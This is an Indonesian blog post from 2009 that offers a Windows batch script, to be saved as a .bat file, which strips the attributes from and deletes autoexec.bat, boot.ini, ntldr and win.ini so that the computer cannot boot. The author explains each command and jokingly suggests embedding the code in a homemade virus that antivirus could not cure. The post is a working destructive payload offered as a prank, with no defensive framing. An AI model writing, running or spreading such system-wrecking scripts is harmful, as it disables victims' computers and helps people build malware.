Jumat, 25 September 2009

Kode Penghancur Komputer

Kode Penghancur Komputer


Waduw, dilihat dari judulnya saja sudah sangat menyeramkan, tapi anda jangan berpikir tentang hal-hal yang negatif terlebih dahulu, soalnya sebenarnya artikel saya kali ini cuma membahas tentang bagaimana cara cepat untuk merusak windows saja, jadi jangan khawatir, komputer anda tidak akan rusak kok, cuman anda hanya butuh melakukan installasi windows lagi saja. hiks hiks hiks.....

Untuk itu, saya akan memberi tahu anda bagaimana langkah-langkahnya. Yang pertama anda lakukan adalah membuka aplikasi note pad anda, lalu copy paste skript di bawah ini.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

simpan penggalan script diatas notepad, dan simpan dgn file apa aja, yang penting berformat *.bat

yupz... saya jelasin satu2 yach scriptnya.

del c:\autoexec.bat <-- buat hapus autoexe.bat di direktori C del c:\boot.ini <---- buat hapus Boot.ini di direktori C del c:\ntldr <--- buat hapus ntldr del c:\windows\win.ini <----- untuk hapus file win.ini yang berlokasi di C:/windows attrib -r -s -h <--- untuk menampilkan file ke 4 windows tadi yang di supper hidden tanpa file autoexec.bat, boot.ini, ntldr, dan win.ini komputer yang bersistem operasikan windows tdk akan mau hidup... hahahahahaha ehm... skrg gmn kl code tadi di masukan dalam virus buatan kita... wew... yakin deh ga ada antivirus buat penawarnya kl sudah terinfeksi..

INGAT DILARANG BERBUAT JAHAT TAPI BERBUATLAH JAIL HAHAHAHAHAHAHAHAHA................


0 komentar:


Blogspot Templates by Isnaini Dot Com. Powered by Blogger and Supported by Urban Designs